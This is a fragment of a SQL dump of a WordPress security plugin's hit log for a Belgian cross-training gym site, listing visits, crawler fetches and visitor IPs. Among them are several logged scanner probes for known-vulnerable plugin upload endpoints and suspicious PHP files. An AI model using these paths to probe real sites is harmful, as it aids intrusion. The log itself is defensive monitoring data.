(76495, 1498902663.924674, 1600959247, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76496, 1498903200.325592, 2366145549, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76497, 1498904741.312288, 621375758, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76498, 1498904773.172297, 621375751, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76499, 1498905735.373823, 1600967971, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76500, 1498918851.864719, 3512961611, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '=Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16'),
(76501, 1498925644.462657, 96260904, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76502, 1498925645.822029, 96260904, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76503, 1498925646.398792, 96260904, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76504, 1498925647.063392, 96260904, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76505, 1498925647.699761, 96260904, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76506, 1498925648.469967, 96260904, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76507, 1498925649.114388, 96260904, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76508, 1498926968.947968, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/603.2.5 (KHTML, like Gecko)'),
(76509, 1498926969.430181, 1837280593, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76510, 1498926969.885207, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76511, 1498926970.407289, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76512, 1498926970.922669, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76513, 1498926971.452161, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76514, 1498926971.832241, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76515, 1498926972.268849, 1837280593, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(76516, 1498926972.670813, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76517, 1498926973.078730, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76518, 1498926973.489071, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76519, 1498926973.951902, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76520, 1498926974.346896, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76521, 1498926974.739169, 1837280593, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.2.5 CFNetwork/760.6.5 Darwin/15.6.0 (x86_64)'),
(76522, 1498929997.909946, 1355389035, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76523, 1498929999.620944, 1355389035, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76524, 1498930114.474957, 1355389035, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76525, 1498930130.461323, 1355389035, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76526, 1498930133.274535, 1355389035, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76527, 1498930154.243128, 1355389035, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76528, 1498930158.397218, 1355389035, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/notre-philosophie/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76529, 1498940268.913731, 1355291200, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76530, 1498940271.398981, 1355291200, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76531, 1498940284.892237, 1355291200, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76532, 1498940304.370453, 1355291200, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/le-cross-training/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76533, 1498940590.918059, 1355291200, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/en-images/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76534, 1498941880.144328, 1123633950, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76535, 1498942757.394395, 96753435, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76536, 1498942758.021563, 3652617276, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/category/uncategorized/', '', 'Mozilla/5.0 (compatible; AhrefsBot/5.2; +http://ahrefs.com/robot/)'),
(76537, 1498945222.860274, 620875541, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76538, 1498945305.344194, 867140598, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET4.0C)'),
(76539, 1498961866.987791, 3003111232, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)'),
(76540, 1498973143.732216, 1592839955, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/fAaWBH.php', 'http://crosstrainingcenter.be/wp-content/plugins/fAaWBH.php', 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)'),
(76541, 1498978655.656130, 1837161381, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G389F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76542, 1498978658.078248, 1837161381, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-G389F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76543, 1498979602.332834, 1998329142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.84 Safari/535.11 SE 2.X MetaSr 1.0'),
(76544, 1498988865.219998, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/603.2.4 (KHTML, like Gecko)'),
(76545, 1498988865.831089, 1538656104, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76546, 1498988866.236279, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76547, 1498988867.683249, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76548, 1498988868.473972, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76549, 1498988868.945729, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76550, 1498988869.455219, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76551, 1498988870.083151, 1538656104, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(76552, 1498988870.490451, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76553, 1498988870.895590, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)');
INSERT INTO `wp_wfHits` (`id`, `ctime`, `IP`, `jsRun`, `is404`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`) VALUES
(76554, 1498988871.288214, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76555, 1498988871.738647, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76556, 1498988872.124103, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76557, 1498988872.512902, 1538656104, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/12603.2.4 CFNetwork/811.5.4 Darwin/16.6.0 (x86_64)'),
(76558, 1498991810.147928, 1375116379, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-G935F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76559, 1498991811.946568, 1375116379, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 7.0; SAMSUNG SM-G935F Build/NRD90M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76560, 1498992579.922099, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/', 'http://www.google.com/', 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2896.3 Safari/537.36'),
(76561, 1498993400.010882, 3645212881, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)'),
(76562, 1498994002.679364, 1539836988, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/', 'http://www.crosstrainingcenter.be/wp-content/plugins/acf-frontend-display/js/blueimp-jQuery-File-Upload-d45deb1/server/php/index.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(76563, 1498994041.921255, 3645212875, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)'),
(76564, 1498994108.150573, 3645212876, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', 'http://crosstrainingcenter.be/sitemap.xml', 'Mozilla/5.0 (compatible; Linux x86_64; Mail.RU_Bot/2.0; +http://go.mail.ru/help/robots)'),
(76565, 1498995693.127977, 1538359134, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'http://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A510F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76566, 1498995695.192618, 1538359134, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A510F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76567, 1498995726.080935, 1538359134, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A510F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76568, 1498995778.726734, 1538359134, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', 'http://www.crosstrainingcenter.be/les-seances-namur/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A510F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76569, 1498995830.675598, 1538359134, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SM-A510F Build/MMB29K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36'),
(76570, 1499005104.457729, 3475901892, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76571, 1499012969.711904, 1338304785, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76572, 1499015105.432059, 1401346405, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G900F Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76573, 1499015108.234844, 1401346405, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G900F Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/5.4 Chrome/51.0.2704.106 Mobile Safari/537.36'),
(76574, 1499021276.093685, 520974776, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)'),
(76575, 1499021276.358442, 1837264142, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://m.facebook.com/', 'Mozilla/5.0 (Android 5.1.1; Mobile; rv:54.0) Gecko/54.0 Firefox/54.0'),
(76576, 1499021278.446751, 1837264142, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Android 5.1.1; Mobile; rv:54.0.1) Gecko/54.0.1 Firefox/54.0.1'),
(76577, 1499021291.717312, 1837264142, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Android 5.1.1; Mobile; rv:54.0) Gecko/54.0 Firefox/54.0'),
(76578, 1499021293.889684, 1837264142, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/le-cross-training/', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Android 5.1.1; Mobile; rv:54.0) Gecko/54.0 Firefox/54.0'),
(76579, 1499022637.254015, 2509962139, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393'),
(76580, 1499032223.289941, 1338304785, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76581, 1499041558.543519, 1338304785, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76582, 1499048331.207497, 3475901894, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(76583, 1499050529.367686, 3024883608, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/contact-form-7/includes/js/\\\'+m.iframeSrc+\\\'', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(76584, 1499055354.387077, 3657083602, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76585, 1499057886.035454, 3657083602, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76586, 1499060059.570363, 1600967943, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(76587, 1499061155.215375, 3657083602, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76588, 1499061395.626554, 1049233589, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(76589, 1499061399.892016, 1049233589, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(76590, 1499061421.391470, 1049233589, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (compatible; MJ12bot/v1.4.7; http://mj12bot.com/)'),
(76591, 1499066085.583431, 3657083602, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76592, 1499072012.726909, 1168357651, 0, 1, 0, 0, 1, 'http://crosstrainingcenter.be/wp-content/plugins/easyrotator-for-wordpress/c.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76593, 1499072173.848474, 1731763595, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/easyrotator-for-wordpress/one.php', 'crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36'),
(76594, 1499074720.921963, 3657083602, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(76595, 1499075332.430379, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76596, 1499075332.917727, 1123632645, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; Google Web Preview Analytics) Chrome/41.0.2272.118 Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(76597, 1499075483.733789, 1463838565, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(76598, 1499075500.004438, 1463838565, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.2.5 (KHTML, like Gecko) Version/10.1.1 Safari/603.2.5'),
(76599, 1499075500.877190, 1463838565, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10603.2.5 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(76600, 1499075501.518509, 1463838565, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10603.2.5 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(76601, 1499076627.203864, 3250520646, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'https://www.google.be/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76602, 1499076629.134280, 3250520646, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/lequipe/', 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36'),
(76603, 1499076660.329841, 3250520646, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', 'http://www.google.be/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwiu7YHa7-zUAhVGZ1AKHVJODZ0QFggvMAE&url=http%3A%2F%2Fwww.crosstrainingcenter.be%2Flequipe%2F&usg=AFQjCNEwoxlHryNYgAimC6M0_H4bYObfZQ', 'Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(76604, 1499076661.432300, 3250520646, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (Windows NT 6.3; Win64; x64; Trident/7.0; rv:11.0) like Gecko'),
